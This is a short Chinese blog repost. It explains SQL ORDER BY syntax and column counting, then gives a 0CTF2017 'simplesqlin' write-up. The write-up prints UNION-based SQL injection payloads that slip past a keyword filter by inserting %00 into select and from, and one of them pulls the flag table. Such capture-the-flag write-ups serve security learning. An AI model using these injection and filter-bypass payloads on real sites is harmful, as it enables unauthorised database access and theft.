https://www.cnblogs.com/claricre/p/6187672.html

http://www.w3school.com.cn/sql/sql_orderby.asp

1. ?select 字段列表/* from 表名 where 條件 order by 字段名1 asc/desc, 字段名2 asc/desc,.......

2. ?select 字段列表/* from 表名 where 條件 order by 字段序號 asc/desc, 字段序號 asc/desc,....... （此時字段序號要從1開始）

3. ?select 字段列表/* from 表名 where 條件 order by 字段別名1 asc/desc, 字段別名2 asc/desc,.......（這里類似于第一種，無非就是把字段名加了個別名來代替而已。）

?

order by 是用來排序的，后面的數(shù)字代表列數(shù)
order by 1 第一列進行排序
。。。
order by 10 錯誤，即沒有第10列
由此可得一共有9列

---

0CTF2017 simplesqlin

一聽名字就大概知道是個sql注入，簡單判斷下是個數(shù)字注入
然后試了試，同樣通過orderby判斷出有三列。
然后發(fā)現(xiàn)select被過濾了，然后發(fā)現(xiàn)插入%00之后就能繞過

id=1 and 1=2 union se%00lect 1,2,3

• 1

接下來有可以爆破了，之后的from和where都被過濾了。
同樣可以插入%00進行繞過，得到表名flag,news
flag表的列名也是flag
所以,payload如下：

id=1 and 1=2 union s%00elect 1,flag,3 fro%00m flag

• 1

轉(zhuǎn)載于:https://www.cnblogs.com/rookieDanny/p/8653127.html

總結(jié)

以上是生活随笔為你收集整理的SQL 注入 OrderBy/0ctf simplesqlin的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。